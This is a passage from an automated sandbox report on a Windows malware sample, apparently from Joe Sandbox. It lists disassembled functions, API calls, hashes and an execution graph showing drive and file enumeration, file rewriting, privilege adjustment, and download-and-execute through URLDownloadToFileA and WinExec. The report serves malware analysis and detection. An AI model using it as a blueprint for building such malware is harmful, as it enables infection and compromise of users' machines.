                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 02B6FC06
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6FCD5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Value$CloseQuery
                                • String ID:
                                • API String ID: 1795622825-0
                                • Opcode ID: 27251d9f16712799c4d635831c1f60135dbabfc2adf0e74510172104c4a49040
                                • Instruction ID: 30867cc35cf41eaacd2159ebbc39aefa097e10c7c28fc5b87bf006971318c293
                                • Opcode Fuzzy Hash: 27251d9f16712799c4d635831c1f60135dbabfc2adf0e74510172104c4a49040
                                • Instruction Fuzzy Hash: CD01A431A01119DBCB24DB88F99C7B9B3B1FB48315F1486E9D40AA7651C7399E81CF54
                                Function 02B6D23D Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 02B6D257
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: ChangeCloseFindNotification
                                • String ID:
                                • API String ID: 2591292051-0
                                • Opcode ID: e25673c02f0a1db50fdea2dfe117749cc66eca0044a94a6f09503eeb5ffb2593
                                • Instruction ID: c3f875a92980f9f70fc136f5dd77d14ff2e4e9b5c7fdf0735b7caf5fe12c32b4
                                • Opcode Fuzzy Hash: e25673c02f0a1db50fdea2dfe117749cc66eca0044a94a6f09503eeb5ffb2593
                                • Instruction Fuzzy Hash: FAF03C79E00258CBDF249BA4D80C7EDB770FB48325F008AD9E559A7280C7B889D4CF11
                                Function 00D69BC1 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                Download Yara Rule
                                APIs
                                • KiUserExceptionDispatcher.NTDLL(?,00D69B69), ref: 00D69BC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2265442991.0000000000D69000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2264290428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265367690.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265367690.0000000000D68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265442991.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265490780.0000000000D79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                Similarity
                                • API ID: DispatcherExceptionUser
                                • String ID:
                                • API String ID: 6842923-0
                                • Opcode ID: b28eeaae62f6e23880d25c289dfa0cc529f8748fb4b8a3ea378fa927efa10cda
                                • Instruction ID: 72eb4c1778c320bc3f8f64b12a78de39a2936dbecb6e63a2fb649cfd8f132e56
                                • Opcode Fuzzy Hash: b28eeaae62f6e23880d25c289dfa0cc529f8748fb4b8a3ea378fa927efa10cda
                                • Instruction Fuzzy Hash: 99D0A9B42002448FEF508F388848438BAE9EF89320B15457CE8CAEB361E7749D40DB02
                                Function 02B653B2 Relevance: 1.4, APIs: 1, Instructions: 166sleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 170012852555bfad279a2d99c81e35ce5f517589d6c1888531b389c394a3fbf9
                                • Instruction ID: 9cc685ade7340415ff6167af1d90aefefb5114ca1992299e7b8fe74876add694
                                • Opcode Fuzzy Hash: 170012852555bfad279a2d99c81e35ce5f517589d6c1888531b389c394a3fbf9
                                • Instruction Fuzzy Hash: 645131B5D90304EFDB20EFA4E94DB793775E708382F544D98E50AAB280D7B855A8CF21
                                Function 02B640AD Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: b66fff17147692a7c2235798a7c4b120bb7d2b97a896f6e55f9c9415db4798f1
                                • Instruction ID: 39554909988afb32e74e1c8d11c350754b7fad9928a8b257f68c2ff7608c5795
                                • Opcode Fuzzy Hash: b66fff17147692a7c2235798a7c4b120bb7d2b97a896f6e55f9c9415db4798f1
                                • Instruction Fuzzy Hash: 6E118EB0E006158BEB74CB00CE497BA7776FB90308F1485F8C649A7644EB798AC5CF08
                                Function 02B61189 Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 4868feb87eae5aabbdfe50750ef5e68b8db4ce9c3dea5de9e2386ee71836d15c
                                • Instruction ID: 9237120b5db0f0a85100d70ed9acffb8e946a7d8179c24fff617e92b780c052a
                                • Opcode Fuzzy Hash: 4868feb87eae5aabbdfe50750ef5e68b8db4ce9c3dea5de9e2386ee71836d15c
                                • Instruction Fuzzy Hash: 7B016270A55208EBEB04EFC8ED08B7E7B75EB01745F104494EA096B380C7B99BA0DB51
                                Function 02B6B811 Relevance: 1.3, APIs: 1, Instructions: 26sleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: d50d37f2fe75fc7041d68242cf1522afe6a84aada7a265c4460afc643d8018fa
                                • Instruction ID: 8fff98364ba5dbbfe14e82d7e04dee0dd8ae32601a97677a1245d754a5b4a5e6
                                • Opcode Fuzzy Hash: d50d37f2fe75fc7041d68242cf1522afe6a84aada7a265c4460afc643d8018fa
                                • Instruction Fuzzy Hash: D5F05876E8030ACBEF249F84D8097BDB770FB0432AF0406A9EA25AB680C7791591CF41
                                Function 02B6BE4B Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: a67a8887f22ea836c709b6dd577452cbf09a2f4461d24eae696bea483b864857
                                • Instruction ID: a2c5a623ecef362002ef2e9653b51179f560d4bf5bb9fe5bf14e5c90ba3aea92
                                • Opcode Fuzzy Hash: a67a8887f22ea836c709b6dd577452cbf09a2f4461d24eae696bea483b864857
                                • Instruction Fuzzy Hash: 29E086B2E40608CFCB24DFA4E8097ADB7B0FB48325F400AA9EB19A72C0D7350450CB55

                                Non-executed Functions

                                Function 02B66A85 Relevance: 4.5, Strings: 3, Instructions: 787COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: x$z${
                                • API String ID: 0-1334427886
                                • Opcode ID: c74c4cf5841158705ee50ce6f5eb449c392b19487c7c3dff384c7bb0a6d6eeb7
                                • Instruction ID: fda569c41e927c96608d419b0976f89e3f6857d2a6d7f21c023a1679c73cd87f
                                • Opcode Fuzzy Hash: c74c4cf5841158705ee50ce6f5eb449c392b19487c7c3dff384c7bb0a6d6eeb7
                                • Instruction Fuzzy Hash: ED621EB1D0010AEFCF14CF98C989ABEB7B6EF94304F248299E415A7384D7389A55DF91
                                Function 02B722A0 Relevance: .2, Instructions: 186COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d858a5ade902b6bb97af8f2e331c720551899d1822917a6242051e2397e39802
                                • Instruction ID: be37d7774495ca564c6dda464bd4146c5e6f47e0473fce9133ed879fe8953b27
                                • Opcode Fuzzy Hash: d858a5ade902b6bb97af8f2e331c720551899d1822917a6242051e2397e39802
                                • Instruction Fuzzy Hash: 9E712C74E0414A9FDB09CF69C4907BFBBF2EF89304F18C4A9D969AB345D6349942CB90

                                Execution Graph

                                Execution Coverage:32.2%
                                Dynamic/Decrypted Code Coverage:6.7%
                                Signature Coverage:10.9%
                                Total number of Nodes:285
                                Total number of Limit Nodes:10
                                execution_graph 889 5b14e1 890 5b14fd GetModuleHandleA 889->890 891 5b1541 889->891 892 5b151a VirtualQuery 890->892 896 5b1512 890->896 893 5b1549 891->893 894 5b1573 891->894 892->896 897 5b1566 893->897 917 5b1af9 893->917 900 5b1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 894->900 896->891 898 5b1579 ExitProcess 901 5b167a 900->901 902 5b167f 900->902 935 5b139f GetVersionExA 901->935 923 5b1718 GetSystemTimeAsFileTime 902->923 905 5b1686 906 5b16ca 905->906 912 5b16a0 CreateThread 905->912 907 5b16d0 906->907 908 5b16d7 906->908 956 5b1581 907->956 910 5b170f 908->910 911 5b16dd lstrcpy 908->911 910->898 911->898 928 5b2c48 memset 912->928 1172 5b1099 912->1172 916 5b1718 3 API calls 916->906 918 5b1b09 917->918 919 5b1b11 917->919 920 5b1638 188 API calls 918->920 921 5b1b16 CreateThread 919->921 922 5b1b0f 919->922 920->922 921->922 1191 5b1638 189 API calls 921->1191 922->897 922->922 924 5b1735 SHSetValueA 923->924 925 5b1754 923->925 927 5b1786 __aulldiv 924->927 926 5b175a SHGetValueA 925->926 925->927 926->927 927->905 962 5b1973 PathFileExistsA 928->962 931 5b2cb2 933 5b2cbb VirtualFree 931->933 934 5b16ba WaitForSingleObject 931->934 932 5b2c8f CreateThread WaitForMultipleObjects 932->931 984 5b2b8c memset GetLogicalDriveStringsA 932->984 933->934 934->916 936 5b14da 935->936 937 5b13cf LookupPrivilegeValueA 935->937 936->902 938 5b13ef 937->938 939 5b13e7 937->939 938->936 1157 5b120e GetModuleHandleA GetProcAddress 938->1157 1152 5b119f GetCurrentProcess OpenProcessToken 939->1152 945 5b1448 GetCurrentProcessId 945->936 946 5b1457 945->946 946->936 947 5b1319 3 API calls 946->947 948 5b147f 947->948 949 5b1319 3 API calls 948->949 950 5b148e 949->950 950->936 951 5b1319 3 API calls 950->951 952 5b14b4 951->952 953 5b1319 3 API calls 952->953 954 5b14c3 953->954 955 5b1319 3 API calls 954->955 955->936 1171 5b185b GetSystemTimeAsFileTime srand rand srand rand 956->1171 958 5b1592 wsprintfA wsprintfA lstrlen CreateFileA 959 5b15fb WriteFile CloseHandle 958->959 960 5b1633 958->960 959->960 961 5b161d ShellExecuteA 959->961 960->910 961->960 963 5b19a0 962->963 964 5b1ac7 962->964 965 5b19af CreateFileA 963->965 964->931 964->932 966 5b1a28 GetFileSize 965->966 967 5b19c4 Sleep 965->967 969 5b1a38 966->969 981 5b1a80 966->981 967->965 968 5b19d5 967->968 983 5b185b GetSystemTimeAsFileTime srand rand srand rand 968->983 971 5b1a3d VirtualAlloc 969->971 969->981 975 5b1a53 971->975 971->981 972 5b1a8d FindCloseChangeNotification 973 5b1a96 972->973 976 5b1aad 973->976 977 5b1a9c DeleteFileA 973->977 974 5b19da wsprintfA CopyFileA 974->966 979 5b1a0d CreateFileA 974->979 980 5b1a59 ReadFile 975->980 975->981 976->964 982 5b1ab8 VirtualFree 976->982 977->976 979->966 979->977 980->975 980->981 981->972 981->973 982->964 983->974 985 5b2c09 WaitForMultipleObjects 984->985 986 5b2bc8 984->986 987 5b2c2a CreateThread 985->987 988 5b2c3c 985->988 989 5b2bfa lstrlen 986->989 990 5b2bd2 GetDriveTypeA 986->990 991 5b2be3 CreateThread 986->991 987->988 995 5b2845 987->995 989->985 989->986 990->986 990->989 991->989 992 5b2b7d 991->992 1005 5b29e2 memset wsprintfA 992->1005 1142 5b274a memset memset SHGetSpecialFolderPathA wsprintfA 995->1142 997 5b2878 DeleteFileA 999 5b289a 997->999 1000 5b288c VirtualFree 997->1000 998 5b2853 998->997 1003 5b2692 8 API calls 998->1003 1004 5b239d 186 API calls 998->1004 1001 5b28ab 999->1001 1002 5b28a4 CloseHandle 999->1002 1000->999 1002->1001 1003->998 1004->998 1006 5b2a3a memset lstrlen lstrcpyn strrchr 1005->1006 1007 5b2abc memset memset FindFirstFileA 1005->1007 1006->1007 1008 5b2a88 1006->1008 1019 5b28b8 memset wsprintfA 1007->1019 1008->1007 1010 5b2a9a lstrcmpiA 1008->1010 1012 5b2aad lstrlen 1010->1012 1013 5b2b74 1010->1013 1012->1007 1012->1010 1014 5b2b61 FindNextFileA 1015 5b2b6d FindClose 1014->1015 1016 5b2b23 1014->1016 1015->1013 1017 5b2b35 lstrcmpiA 1016->1017 1018 5b28b8 174 API calls 1016->1018 1017->1015 1017->1016 1018->1014 1020 5b2951 memset 1019->1020 1021 5b2905 1019->1021 1020->1014 1021->1020 1022 5b291b memset wsprintfA 1021->1022 1023 5b2956 strrchr 1021->1023 1025 5b29e2 180 API calls 1022->1025 1023->1020 1024 5b2967 lstrcmpiA 1023->1024 1026 5b297a 1024->1026 1027 5b2988 lstrcmpiA 1024->1027 1025->1020 1037 5b1e6e 1026->1037 1027->1020 1029 5b2994 1027->1029 1030 5b29ad strstr 1029->1030 1031 5b29a5 lstrcpy 1029->1031 1032 5b29cb 1030->1032 1033 5b29d3 1030->1033 1031->1030 1080 5b239d strstr 1032->1080 1102 5b2692 1033->1102 1038 5b1e7d 1037->1038 1111 5b1df6 strrchr 1038->1111 1041 5b2332 1045 5b233d UnmapViewOfFile 1041->1045 1046 5b2346 1041->1046 1042 5b1eb0 SetFileAttributesA CreateFileA 1042->1041 1043 5b1edf 1042->1043 1116 5b1915 1043->1116 1045->1046 1048 5b234b FindCloseChangeNotification 1046->1048 1049 5b2350 1046->1049 1048->1049 1050 5b2391 1049->1050 1051 5b2356 FindCloseChangeNotification 1049->1051 1050->1020 1051->1050 1052 5b1f2e 1052->1041 1122 5b1c81 1052->1122 1056 5b1f92 1057 5b1c81 2 API calls 1056->1057 1058 5b1f9f 1057->1058 1058->1041 1059 5b1af9 169 API calls 1058->1059 1060 5b2024 1058->1060 1064 5b1fc0 1059->1064 1060->1041 1061 5b1af9 169 API calls 1060->1061 1062 5b207a 1061->1062 1063 5b1af9 169 API calls 1062->1063 1068 5b2090 1063->1068 1064->1041 1064->1060 1065 5b1af9 169 API calls 1064->1065 1066 5b1ffe 1065->1066 1067 5b2013 FlushViewOfFile 1066->1067 1067->1060 1069 5b20bb memset memset 1068->1069 1070 5b20f5 1069->1070 1071 5b1c81 2 API calls 1070->1071 1072 5b21de 1071->1072 1073 5b2226 memcpy UnmapViewOfFile FindCloseChangeNotification 1072->1073 1127 5b1b8a 1073->1127 1075 5b226e 1135 5b185b GetSystemTimeAsFileTime srand rand srand rand 1075->1135 1077 5b22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1078 5b1915 3 API calls 1077->1078 1079 5b231f CloseHandle 1078->1079 1079->1041 1081 5b2451 CreateFileA GetFileSize 1080->1081 1087 5b23d8 1080->1087 1082 5b2480 1081->1082 1083 5b2675 CloseHandle 1081->1083 1082->1083 1085 5b2499 1082->1085 1084 5b267c RemoveDirectoryA 1083->1084 1086 5b2687 1084->1086 1088 5b1915 3 API calls 1085->1088 1086->1020 1087->1081 1087->1086 1089 5b24a4 9 API calls 1088->1089 1137 5b189d memset CreateProcessA 1089->1137 1092 5b255c Sleep memset wsprintfA 1093 5b29e2 163 API calls 1092->1093 1094 5b2597 memset wsprintfA Sleep 1093->1094 1095 5b189d 6 API calls 1094->1095 1096 5b25e4 Sleep CreateFileA 1095->1096 1097 5b1915 3 API calls 1096->1097 1098 5b2610 CloseHandle 1097->1098 1098->1084 1099 5b261e 1098->1099 1099->1084 1100 5b2641 SetFilePointer WriteFile 1099->1100 1100->1084 1101 5b2667 SetEndOfFile 1100->1101 1101->1084 1103 5b26b2 WaitForSingleObject 1102->1103 1104 5b26a2 CreateEventA 1102->1104 1105 5b26c1 lstrlen ??2@YAPAXI 1103->1105 1108 5b2708 1103->1108 1104->1103 1106 5b26da lstrcpy 1105->1106 1107 5b2736 SetEvent 1105->1107 1109 5b26f1 1106->1109 1107->1020 1108->1107 1110 5b2718 lstrcpy ??3@YAXPAX 1108->1110 1109->1107 1110->1109 1112 5b1e13 lstrcpy strrchr 1111->1112 1113 5b1e62 1111->1113 1112->1113 1114 5b1e40 lstrcmpiA 1112->1114 1113->1041 1113->1042 1114->1113 1115 5b1e52 lstrlen 1114->1115 1115->1113 1115->1114 1117 5b1928 1116->1117 1118 5b1924 SetFilePointer CreateFileMappingA MapViewOfFile 1116->1118 1119 5b194f 1117->1119 1120 5b192e memset GetFileTime 1117->1120 1118->1041 1118->1052 1119->1118 1121 5b1954 SetFileTime 1119->1121 1120->1118 1121->1118 1123 5b1c9c 1122->1123 1124 5b1c94 1122->1124 1123->1124 1125 5b1cae memset memset 1123->1125 1124->1041 1126 5b185b GetSystemTimeAsFileTime srand rand srand rand 1124->1126 1125->1124 1126->1056 1133 5b1b93 1127->1133 1129 5b1bca srand 1130 5b1bd8 rand 1129->1130 1131 5b1c08 1130->1131 1131->1130 1132 5b1c29 memset memcpy lstrcat 1131->1132 1132->1075 1133->1133 1136 5b185b GetSystemTimeAsFileTime srand rand srand rand 1133->1136 1135->1077 1136->1129 1138 5b190c 1137->1138 1139 5b18e0 CloseHandle WaitForSingleObject 1137->1139 1138->1084 1138->1092 1140 5b18fb GetExitCodeProcess 1139->1140 1141 5b1907 CloseHandle 1139->1141 1140->1141 1141->1138 1151 5b185b GetSystemTimeAsFileTime srand rand srand rand 1142->1151 1144 5b27b5 wsprintfA CopyFileA 1145 5b27de wsprintfA 1144->1145 1146 5b2840 1144->1146 1147 5b1973 17 API calls 1145->1147 1146->998 1148 5b280f 1147->1148 1149 5b2813 DeleteFileA 1148->1149 1150 5b2820 CreateFileA 1148->1150 1149->1150 1150->1146 1151->1144 1153 5b1200 CloseHandle 1152->1153 1154 5b11c6 AdjustTokenPrivileges 1152->1154 1153->938 1155 5b11f7 CloseHandle 1154->1155 1156 5b11f6 1154->1156 1155->1153 1156->1155 1158 5b123f GetCurrentProcessId OpenProcess 1157->1158 1159 5b1310 1157->1159 1158->1159 1163 5b1262 1158->1163 1159->936 1166 5b1319 1159->1166 1160 5b12b0 VirtualAlloc 1160->1163 1164 5b12b8 1160->1164 1161 5b12f1 CloseHandle 1161->1159 1162 5b1302 VirtualFree 1161->1162 1162->1159 1163->1160 1163->1161 1163->1164 1165 5b1296 VirtualFree 1163->1165 1164->1161 1165->1160 1167 5b134a 1166->1167 1168 5b132a GetModuleHandleA GetProcAddress 1166->1168 1169 5b1351 memset 1167->1169 1170 5b1363 1167->1170 1168->1167 1168->1170 1169->1170 1170->936 1170->945 1171->958 1173 5b1196 1172->1173 1174 5b10ba 1172->1174 1174->1173 1190 5b185b GetSystemTimeAsFileTime srand rand srand rand 1174->1190 1176 5b1118 wsprintfA wsprintfA URLDownloadToFileA 1177 5b1168 lstrlen Sleep 1176->1177 1178 5b10dc 1176->1178 1177->1174 1181 5b1000 CreateFileA 1178->1181 1182 5b1092 WinExec lstrlen 1181->1182 1183 5b1025 GetFileSize CreateFileMappingA MapViewOfFile 1181->1183 1182->1173 1182->1174 1184 5b107b 1183->1184 1185 5b1057 1183->1185 1187 5b108d CloseHandle 1184->1187 1188 5b1087 CloseHandle 1184->1188 1186 5b1074 UnmapViewOfFile 1185->1186 1189 5b1061 1185->1189 1186->1184 1187->1182 1188->1187 1189->1186 1190->1176 1206 5b2361 1207 5b236b UnmapViewOfFile 1206->1207 1208 5b2374 1206->1208 1207->1208 1209 5b2379 CloseHandle 1208->1209 1210 5b2382 1208->1210 1209->1210 1211 5b2388 CloseHandle 1210->1211 1212 5b2391 1210->1212 1211->1212 1192 5b6076 1193 5b607b 1192->1193 1197 5b60c7 1192->1197 1195 5b60b0 VirtualAlloc 1193->1195 1193->1197 1203 5b61b2 1193->1203 1194 5b615f VirtualFree 1194->1197 1195->1197 1196 5b6198 VirtualFree 1196->1203 1197->1194 1197->1196 1198 5b60d5 VirtualAlloc 1197->1198 1198->1197 1199 5b6389 VirtualProtect 1202 5b63b7 1199->1202 1200 5b63fc VirtualProtect 1201 5b6400 1200->1201 1202->1200 1204 5b63e7 VirtualProtect 1202->1204 1203->1199 1205 5b62fb 1203->1205 1204->1200 1204->1202 1213 5b6014 1214 5b605f 1213->1214 1215 5b6035 GetModuleHandleA 1213->1215 1216 5b604d GetProcAddress 1215->1216 1217 5b6058 1216->1217 1217->1214 1217->1216 1217->1217

                                Callgraph

                                • Executed
                                • Not Executed
                                • Opacity -> Relevance
                                • Disassembly available
                                callgraph 0 Function_005B185B 1 Function_005B235D 2 Function_005B17D0 3 Function_005B274A 3->0 10 Function_005B1973 3->10 4 Function_005B2C48 4->10 39 Function_005B2B8C 4->39 5 Function_005B66C8 40 Function_005B6B02 5->40 45 Function_005B6D00 5->45 46 Function_005B6A84 5->46 6 Function_005B2845 6->3 28 Function_005B239D 6->28 30 Function_005B2692 6->30 7 Function_005B1AF9 47 Function_005B1638 7->47 8 Function_005B6CF8 9 Function_005B2B7D 18 Function_005B29E2 9->18 10->0 11 Function_005B6CF2 11->8 12 Function_005B2CF0 13 Function_005B6076 13->5 14 Function_005B1DF6 15 Function_005B1C68 16 Function_005B1E6E 16->0 16->7 16->14 16->15 21 Function_005B2D60 16->21 22 Function_005B2D9B 16->22 32 Function_005B1915 16->32 34 Function_005B1D8A 16->34 35 Function_005B1B8A 16->35 42 Function_005B1C81 16->42 17 Function_005B6B63 49 Function_005B69B0 17->49 50 Function_005B6834 17->50 53 Function_005B67A4 17->53 48 Function_005B28B8 18->48 19 Function_005B14E1 19->7 19->47 20 Function_005B2361 20->22 23 Function_005B1099 23->0 44 Function_005B1000 23->44 24 Function_005B1319 25 Function_005B1718 25->12 26 Function_005B119F 27 Function_005B139F 27->24 27->26 38 Function_005B120E 27->38 28->18 29 Function_005B189D 28->29 28->32 31 Function_005B6012 33 Function_005B6014 35->0 36 Function_005B600A 37 Function_005B680F 39->6 39->9 40->17 41 Function_005B6001 41->36 43 Function_005B1581 43->0 44->2 45->11 45->17 45->49 46->11 46->37 47->2 47->4 47->23 47->25 47->27 47->43 48->16 48->18 48->28 48->30 51 Function_005B6734 51->40 51->45 51->46 52 Function_005B65A6

                                Executed Functions

                                Function 005B29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128stringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 101 5b29e2-5b2a34 memset wsprintfA 102 5b2a3a-5b2a86 memset lstrlen lstrcpyn strrchr 101->102 103 5b2abc-5b2b21 memset * 2 FindFirstFileA call 5b28b8 memset 101->103 102->103 104 5b2a88-5b2a98 102->104 110 5b2b61-5b2b6b FindNextFileA 103->110 104->103 106 5b2a9a-5b2aa7 lstrcmpiA 104->106 108 5b2aad-5b2aba lstrlen 106->108 109 5b2b74-5b2b7a 106->109 108->103 108->106 111 5b2b6d-5b2b6e FindClose 110->111 112 5b2b23-5b2b2a 110->112 111->109 113 5b2b4c-5b2b5c call 5b28b8 112->113 114 5b2b2c-5b2b33 112->114 113->110 114->113 115 5b2b35-5b2b4a lstrcmpiA 114->115 115->111 115->113
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                • String ID: %s*$C:\$Documents and Settings
                                • API String ID: 2826467728-110786608
                                • Opcode ID: aa503b9cf402b02d563d82e8b570399e6da9818dcabedce4e3f4976656bfd8d5
                                • Instruction ID: a64862c0211e468351514b48982a80ebe8c265534c8461a10deb83ce5cec64a3
                                • Opcode Fuzzy Hash: aa503b9cf402b02d563d82e8b570399e6da9818dcabedce4e3f4976656bfd8d5
                                • Instruction Fuzzy Hash: 704143B2404349AFD761EBA0DC4DDEBBBACFF94315F040929F944D2111E635FA489BA2
                                Function 005B1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65timeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 216 5b1718-5b1733 GetSystemTimeAsFileTime 217 5b1735-5b1752 SHSetValueA 216->217 218 5b1754-5b1758 216->218 219 5b17c6-5b17cd 217->219 218->219 220 5b175a-5b1784 SHGetValueA 218->220 220->219 221 5b1786-5b17b3 call 5b2cf0 * 2 220->221 221->219 226 5b17b5 221->226 227 5b17bf 226->227 228 5b17b7-5b17bd 226->228 227->219 228->219 228->227
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B1729
